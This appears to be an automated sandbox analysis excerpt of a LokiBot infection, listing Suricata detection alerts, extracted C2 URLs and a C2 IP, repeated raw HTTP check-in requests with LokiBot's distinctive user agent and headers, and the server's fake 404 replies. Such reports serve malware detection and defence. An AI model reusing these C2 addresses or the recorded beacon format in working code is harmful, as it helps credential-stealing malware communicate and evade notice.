                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49889 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:50004
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49938 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49938 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49928
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49990 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49990 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49990 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49952 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49952 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49952 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:50009
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49750 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49750 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49938 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49750
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49938 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49938 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49889
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49938
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49990 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49990 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49990
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49952 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49952 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:50012 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:50012 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:50012 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49952
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:50012 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:50012 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:50012
                Source: Malware configuration extractorURLs: http://kbfvzoboss.bid/alien/fre.php
                Source: Malware configuration extractorURLs: http://alphastand.trade/alien/fre.php
                Source: Malware configuration extractorURLs: http://alphastand.win/alien/fre.php
                Source: Malware configuration extractorURLs: http://alphastand.top/alien/fre.php
                Source: Malware configuration extractorURLs: 94.156.177.41/simple/five/fre.php
                Source: Joe Sandbox ViewIP Address: 94.156.177.41 94.156.177.41
                Source: Joe Sandbox ViewASN Name: NET1-ASBG NET1-ASBG
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 192Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 192Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 165Connection: close
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeCode function: 20_2_00404ED4 recv,20_2_00404ED4
                Source: unknownHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 192Connection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:14:16 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:14:18 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:14:19 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:14:21 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:14:23 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:14:24 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:14:27 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 08:14:28 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
